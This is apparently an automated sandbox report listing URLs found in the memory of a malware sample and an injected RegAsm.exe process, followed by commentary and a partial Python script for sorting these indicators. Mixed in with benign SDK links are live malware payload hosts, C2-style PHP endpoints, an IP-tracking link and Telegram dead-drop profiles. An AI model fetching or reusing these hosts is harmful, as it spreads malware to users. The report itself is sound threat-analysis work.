Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exe1
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exeC:
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exeP
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exeb
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exei.dll
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exej
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exen
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.00000000010AA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66d98aa7bea3e_newPrime.exe#real
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66d98aa7bea3e_newPrime.exe#real9
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66d98aa7bea3e_newPrime.exe#real?
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66d98aa7bea3e_newPrime.exe#realC:
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66d98aa7bea3e_newPrime.exe#realStrong
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66d98aa7bea3e_newPrime.exe#reall
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66d98aa7bea3e_newPrime.exe#realw
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upus
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusC:
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusG
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusZ
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d897ad1752a_File.exe#xin
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d897ad1752a_File.exe#xinB
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d897ad1752a_File.exe#xinC:
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d897ad1752a_File.exe#xinryptolC
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d9de22f231f_crypted.exe#1
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d9de22f231f_crypted.exe#1B
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d9de22f231f_crypted.exe#1C:
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d9de22f231f_crypted.exe#1usoU
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001179000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.109/bobr
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.109/bobrC:
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.109/bobrZ
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001179000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.109/bobrp
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.33/ssl/install.exe
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.33/ssl/install.exeC:
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.33/ssl/install.exezAp
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148/
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148/api/crazyfish.php
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148/api/twofish.php
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001179000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148/api/twofish.phpZA
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148/~
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148:80/api/crazyfish.php
Source: RegAsm.exe, 00000002.00000002.1954978502.0000000004961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148:80/api/twofish.php
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001179000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148:80/api/twofish.phpB1CAD8C-2DAB-11D2-B604-00104B703EFD
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148:80/api/twofish.php_C
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://240902180529931.tyr.zont16.com/f/fikbam0902931.exe
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://240902180529931.tyr.zont16.com/f/fikbam0902931.exe7
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://240902180529931.tyr.zont16.com/f/fikbam0902931.exeC:
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://240902180529931.tyr.zont16.com/f/fikbam0902931.exeZA
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.9/nokia/lamp.exe
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.9/nokia/lamp.exe0
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.9/nokia/lamp.exeC:
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CF9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/sgnr.exe#space
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/sgnr.exe#space?
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/sgnr.exe#spaceC:
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/sgnr.exe#spacet=
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/sgnr.exe#spaceuWZ
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CF9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/vjgg.exe#space
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/vjgg.exe#spaceC:
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/vjgg.exe#spaceQZ~
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/vjgg.exe#spaceu4
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/vjgg.exe#spacez=
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://aka.ms/msal-net-iwa
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://aka.ms/valid-authorities
Source: 7wpHB_IZvVwIDf0EgO_TfPH6.exe, 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gacan.zapto.org_DEBUG.zip/c
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: PsIhedmEA44FNRssEU8V9OlH.exe, 00000007.00000003.1938610261.0000000002360000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.innosetup.com/
Source: PsIhedmEA44FNRssEU8V9OlH.exe, 00000007.00000003.1938610261.0000000002360000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.remobjects.com/ps
Source: PsIhedmEA44FNRssEU8V9OlH.exe, 00000007.00000003.1938610261.0000000002360000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.remobjects.com/psU
Source: gobEmOm5sr.exe, 00000000.00000000.1648178201.0000000000EDE000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.softwareok.com/?Download=MagicMouseTrails
Source: gobEmOm5sr.exe, 00000000.00000000.1648178201.0000000000EDE000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.softwareok.com/?seite=Microsoft/MagicMouseTrails
Source: gobEmOm5sr.exe, 00000000.00000000.1648178201.0000000000EDE000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.softwareok.com/?seite=Microsoft/MagicMouseTrails/History
Source: gobEmOm5sr.exe, 00000000.00000000.1648178201.0000000000EDE000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.softwareok.de/?Download=MagicMouseTrails
Source: gobEmOm5sr.exe, 00000000.00000000.1648178201.0000000000EDE000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.softwareok.de/?seite=Microsoft/MagicMouseTrails
Source: gobEmOm5sr.exe, 00000000.00000000.1648178201.0000000000EDE000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.softwareok.de/?seite=Microsoft/MagicMouseTrails/History
Source: gobEmOm5sr.exe, 00000000.00000002.1654904203.0000000004EF5000.00000004.00000800.00020000.00000000.sdmp, gobEmOm5sr.exe, 00000000.00000002.1654904203.0000000004C65000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1947694025.000000000056B000.00000040.00000400.00020000.00000000.sdmp, REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDllm_object
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/adal-iwa
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/adal-net-broker-redirect-uri-android
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/adal_token_cache_serialization
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/adal_token_cache_serializationdFailed
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-brokers
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-brokers.
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-client-apps
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-interactive-android
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-2-released)
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-3-breaking-changes
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-3-breaking-changesy
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-change
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-change)
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-changeC
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-application-configuration
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-b2c
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-brokers
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-enable-keychain-access
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-enable-keychain-groups
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-iwa
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-system-browsers
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-up
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-up)
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.msa/msal-net-3x-cache-breaking-change
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.datamarket.azure.com/data.ashx/
Source: 2Umx78uafM0WA03fzJyYYhBa.exe, 0000000E.00000002.2120842089.00000000043E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/?format=json
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/?format=jsonZC
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/J
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org:443/?format=json
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datamarket.azure.com/embedded/catalog?client_id=
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datamarket.azure.com/embedded/consent?client_id=
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datamarket.azure.com/embedded/query?client_id=
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datamarket.azure.com/embedded/resultrhttps://datamarket.accesscontrol.windows.net/v2/OAuth2-
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/&
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.00000000010ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/download
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/download=
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/downloadC:
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app:80/
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app:80/download
Source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000000.1922223189.00000000007C2000.00000002.00000001.01000000.0000000A.sdmp, 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000000.1923341342.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: https://github.com/dotnet/wpf
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: gobEmOm5sr.exe, 00000000.00000002.1654904203.0000000004EF5000.00000004.00000800.00020000.00000000.sdmp, gobEmOm5sr.exe, 00000000.00000002.1654904203.0000000004C65000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1947694025.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/https://ipgeolocation.io/::
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/s
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33X
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/0
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/1nhuM4.js
Source: RegAsm.exe, 00000002.00000002.1954978502.0000000004961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org:443/1nhuM4.jsoft
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://login.microsoftonline.com/common
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://login.microsoftonline.com/common/
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://sso2urn:ietf:wg:oauth:2.0:oob
Source: 7wpHB_IZvVwIDf0EgO_TfPH6.exe, 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199768374681
Source: 7wpHB_IZvVwIDf0EgO_TfPH6.exe, 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/edm0d
Source: 7wpHB_IZvVwIDf0EgO_TfPH6.exe, 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/fneogr
Source: 7wpHB_IZvVwIDf0EgO_TfPH6.exe, 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/fneogrnfeowkhttps://t.me/edm0di11ihttps://steamcommunity.com/profiles/76561199768374681
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.nuget.org/packages/Microsoft.Identity.Json.Bson
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtransfer.net/
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CF9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.0000000001112000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtransfer.net/handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5f
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtransfer.net/z
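The string hits above mix three kinds of URL: benign SDK references embedded by the MSAL and Json.NET libraries the loader is built on, IP-geolocation lookups the stealer performs against the victim, and the delivery, tracking and dead-drop hosts that are the actual indicators. Many lines are also the same URL read back from memory with a few trailing bytes of the next string glued on (`...change)` next to `...changeC`, `/download` next to `/downloadC:`), or two URLs concatenated without a separator. The following Python, added here as an example rather than code from the report or the sample, parses lines in the report's own format, splits concatenated URLs, strips glued-on punctuation and default ports, merges over-read variants into their shortest form, keeps track of which process held each string, and sorts the result into triage buckets. The host groupings in `CATEGORIES` are my own; the sample lines are copied from the section above, with the multi-dump source lists cut to their first dump.

```python
import re
from collections import defaultdict

# Lines copied from the "String found in binary or memory" section of the report (subset;
# source lists on the longest lines are cut to their first memory dump).
REPORT_LINES = [
    "Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-change)",
    "Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-changeC",
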